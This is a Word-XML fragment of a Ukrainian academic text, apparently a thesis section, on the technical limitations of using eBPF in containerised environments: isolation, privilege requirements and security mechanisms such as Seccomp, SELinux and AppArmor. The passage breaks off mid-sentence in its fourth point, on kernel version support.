      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:caps/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Сумісність та використання eBPF з платформами та інструментами безпеки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRDefault="005F0B54" w:rsidP="005F0B54">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRPr="005F0B54" w:rsidRDefault="005F0B54" w:rsidP="005F0B54">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1. Технічні обмеження </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>eBPF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в контексті контейнеризації</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00257E61" w:rsidRDefault="00257E61" w:rsidP="00257E61">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5F0B54" w:rsidRPr="005F0B54" w:rsidRDefault="002865BF" w:rsidP="00257E61">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2865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Сьогодні </w:t>
      </w:r>
      <w:r w:rsidR="00257E61" w:rsidRPr="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">eBPF завдяки своїй універсальності знайшов широке застосування в різних сферах, від моніторингу мережевого трафіку до посилення безпеки та покращення продуктивності систем. Однак у середовищах контейнеризації, де критично важливими є ізоляція, безпека та ефективність, виникають значні технічні труднощі при </w:t>
      </w:r>
      <w:r w:rsidR="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">його </w:t>
      </w:r>
      <w:r w:rsidR="00257E61" w:rsidRPr="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>використанні, що обмежує його потенціал у таких умовах. Контейнеризація створює певні виклики для eBPF, зокрема через обмежений доступ контейнерів до системних ресурсів хоста, необхідність підвищених привілеїв, ізоляцію між контейнерами та вимогу до впровадження ефективних механізмів безпеки.</w:t>
      </w:r>
      <w:r w:rsidR="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00257E61" w:rsidRPr="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>У цьому контексті важливо ро</w:t>
      </w:r>
      <w:r w:rsidR="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>зглянути, які саме технічні бар’</w:t>
      </w:r>
      <w:r w:rsidR="00257E61" w:rsidRPr="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>єри існують при інтеграції eBPF у контейнеризовані середовища, а також можливі шляхи їх подолання для забезпечення ефективної та безпечної роботи таких систем</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [11]</w:t>
      </w:r>
      <w:r w:rsidR="00257E61" w:rsidRPr="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRDefault="002865BF" w:rsidP="003269E9">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2865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00257E61" w:rsidRPr="00257E61">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Деталізуючи наявні виклики, можна виокремити кілька ключових технічних обмежень при використанні eBPF у контейнеризованих середовищах</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>. По-перше, ізоляція між контейнерами</w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> створює обмеження для використання eBPF, оскільки вона обмежує доступ до системних ресурсів хоста, необхідних для коректної роботи eBPF-програм. Контейнери працюють в ізольованому середовищі, що ускладнює доступ до ядра </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="00BF4687" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>та до низькорівневих функцій, необхідних для моніторингу або модифікації системних викликів. Наприклад, для коректної роботи з фільтрацією мережевого трафіку або для доступу до певних системних викликів контейнеру можуть знадобитися привілеї, яких він не має в стандартних умовах. Це суперечить</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> основній меті контейнеризації –</w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> забезпеченню безпеки </w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>та обмеженню привілеїв, оскільки надання таких прав порушує принцип мінімальних привілеїв і підвищує ризики безпеки</w:t>
      </w:r>
      <w:r w:rsidRPr="002865BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [11]</w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRPr="005F0B54" w:rsidRDefault="007538B2" w:rsidP="003269E9">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7538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Ще одн</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>им</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> важлив</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>им</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> обмеження</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">м є </w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>питання привілеїв</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> що</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> також є важливою проблемою для використання eBPF у контейнерах. Для роботи з деякими системними викликами та ресурсами контейнеру можуть знадобитись права адміністратора (root), що підвищує ризики для безпеки. Багато eBPF-програм вимагають привілеїв, які контейнери зазвичай не мають, що ускладнює їх використання в середовищах з обмеженими правами доступу. Хоча існують технології, які дозволяють запускати eBPF без необхідності привілеїв (наприклад, unprivileged BPF), вони мають свої обмеження і не завжди забезпечують всю функціональність eBPF</w:t>
      </w:r>
      <w:r w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [12]</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRPr="005F0B54" w:rsidRDefault="007538B2" w:rsidP="003269E9">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7538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Третьою складовою є </w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>належн</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>і</w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> механізм</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> безпеки</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Оскільки eBPF дозволяє виконувати код на рівні ядра </w:t>
      </w:r>
      <w:r w:rsidR="00BF4687">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ОС</w:t>
      </w:r>
      <w:r w:rsidR="003269E9" w:rsidRPr="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, це збільшує ризик експлуатації вразливостей у разі несанкціонованого доступу до контейнера.</w:t>
      </w:r>
      <w:r w:rsidR="003269E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Тому, у</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> разі компрометації контейнера з відповідними привілеями зловмисник може модифікувати eBPF-програми або використовувати їх для виконання зловмисних дій на рівні ядра. Для зменшення таких ризиків використовуються додаткові механізми безпеки, як-от Seccomp, SELinux або AppArmor, які дозволяють точно контролювати доступ контейнерів до системних ресурсів</w:t>
      </w:r>
      <w:r w:rsidRPr="007538B2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>”, - [13]</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F0B54" w:rsidRPr="005F0B54" w:rsidRDefault="003269E9" w:rsidP="008335DA">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Четвертим викликом є н</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>есумісність або обмеже</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>на підтримка певних версій ядра.</w:t>
      </w:r>
      <w:r w:rsidR="005F0B54" w:rsidRPr="005F0B54">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З</w:t>
      </w:r>
      <w:r w:rsidRPr="005F0B54">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">азвичай </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial Unicode MS" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
